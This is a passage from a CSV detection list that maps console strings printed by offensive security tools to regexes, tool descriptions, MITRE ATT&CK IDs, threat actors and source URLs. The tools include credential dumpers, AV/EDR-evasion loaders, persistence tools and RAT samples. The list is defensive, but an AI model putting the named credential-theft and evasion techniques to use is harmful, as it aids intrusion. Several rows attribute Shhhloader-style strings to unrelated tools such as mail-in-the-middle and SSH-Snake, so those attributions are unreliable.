file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - 
T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13391" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#content","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","13392" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13393" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13394" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - 
self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13395" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13396" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13397" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print 
output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13398" "*[+] Using Obfuscator-LLVM to compile stub*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13399" "*[+] Using Obfuscator-LLVM to compile stub...*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub\.\.\..{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13400" "*[+] Using Obfuscator-LLVM to compile stub...*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub\.\.\..{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13401" "*[+] Using Obfuscator-LLVM to compile*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented 
weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#content","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","13402" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13403" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13404" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13405" "*[+] Using SysWhispers2 for 
syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13406" "*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13407" "*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13408" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13409" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13410" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13411" "*[+] Using username enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\susername\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13412" "*[+] Using WMI to set WMI 
SD*",".{0,1000}\[\+\]\sUsing\sWMI\sto\sset\sWMI\sSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#content","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","13413" "*[+] v1.0 @decoder_it 2023*",".{0,1000}\[\+\]\sv1\.0\s\@decoder_it\s2023.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","13414" "*[+] Valid login* user must enroll in MFA.*",".{0,1000}\[\+\]\sValid\slogin.{0,1000}\suser\smust\senroll\sin\sMFA\..{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","#content","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","13415" "*[+] Valid shellcode execution methods are: PoolPartyModuleStomping*",".{0,1000}\[\+\]\sValid\sshellcode\sexecution\smethods\sare\:\sPoolPartyModuleStomping.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13416" "*[+] Victim * have office365 
Licence!*",".{0,1000}\[\+\]\sVictim\s.{0,1000}\shave\soffice365\sLicence!.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","#content","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","13417" "*[+] WdFilter Altitude Registry key has been successfully deleted*",".{0,1000}\[\+\]\sWdFilter\sAltitude\sRegistry\skey\shas\sbeen\ssuccessfully\sdeleted.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#content","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","13418" "*[+] WmiExec *",".{0,1000}\[\+\]\sWmiExec\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#content","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","13419" "*[+] WOOT! 
Created elevated process *",".{0,1000}\[\+\]\sWOOT!\sCreated\selevated\sprocess\s.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#content","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","13420" "*[+] XDG persistence established!*",".{0,1000}\[\+\]\sXDG\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13421" "*[+] You spin my gato round right round ?*",".{0,1000}\[\+\]\sYou\sspin\smy\sgato\sround\sright\sround\s\?.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#content","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","13422" "*[+] Your payload must be executed now !*",".{0,1000}\[\+\]\sYour\spayload\smust\sbe\sexecuted\snow\s!.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","#content","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","13423" "*[+]ImpersonateLoggedOnUser() succeed!*",".{0,1000}\[\+\]ImpersonateLoggedOnUser\(\)\ssucceed!.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","#content","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","13424" "*[=] Dumping LSASS memory*",".{0,1000}\[\=\]\sDumping\sLSASS\smemory.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","13425" "*[->] sending payload..as chuncks*",".{0,1000}\[\-\>\]\ssending\spayload\.\.as\schuncks.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name 
to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#content","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","13426" "*[ADA] Searching for accounts with msSFU30Password attribute*",".{0,1000}\[ADA\]\sSearching\sfor\saccounts\swith\smsSFU30Password\sattribute.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13427" "*[ADA] Searching for accounts with userpassword attribute*",".{0,1000}\[ADA\]\sSearching\sfor\saccounts\swith\suserpassword\sattribute.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13428" "*[Author:-Ege-Balc?-]*",".{0,1000}\[Author\:\-Ege\-Balc\?\-\].{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#content","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","13442" "*[BAD R.A.T.]-Company CGI-Notify*",".{0,1000}\[BAD\sR\.A\.T\.\]\-Company\sCGI\-Notify.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 
- TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13443" "*[BAD R.A.T.]-Company PHP(MySQL)-Notify*",".{0,1000}\[BAD\sR\.A\.T\.\]\-Company\sPHP\(MySQL\)\-Notify.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13444" "*[BAD R.A.T.]-Company PHP-Notify*",".{0,1000}\[BAD\sR\.A\.T\.\]\-Company\sPHP\-Notify.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13445" "*[bruteforce_mode]*",".{0,1000}\[bruteforce_mode\].{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","#content","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","13446" "*[c0d3d p0is0n].exe*",".{0,1000}\[c0d3d\sp0is0n\]\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13447" "*[CamHacker]*",".{0,1000}\[CamHacker\].{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","13448" "*[console]::WriteLine('Obfuscation Rocks!')*",".{0,1000}\[console\]\:\:WriteLine\(\'Obfuscation\sRocks!\'\).{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#content","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","13449" "*[D3m0niz3d]~#*",".{0,1000}\[D3m0niz3d\]\~\#.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","13450" "*[E] Unable to read LSA secrets. 
Perhaps you are not SYTEM?*",".{0,1000}\[E\]\sUnable\sto\sread\sLSA\ssecrets\.\s\sPerhaps\syou\sare\snot\sSYTEM\?.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","13451" "*[experimental] Extract keys from CAPI RSA/AES provider*",".{0,1000}\[experimental\]\sExtract\skeys\sfrom\sCAPI\sRSA\/AES\sprovider.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13452" "*[experimental] Patch CNG service for easy export*",".{0,1000}\[experimental\]\sPatch\sCNG\sservice\sfor\seasy\sexport.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - 
T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13453" "*[experimental] Patch CryptoAPI layer for easy export*",".{0,1000}\[experimental\]\sPatch\sCryptoAPI\slayer\sfor\seasy\sexport.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - 
Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13454" "*[experimental] patch Events service to avoid new events*",".{0,1000}\[experimental\]\spatch\sEvents\sservice\sto\savoid\snew\sevents.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - 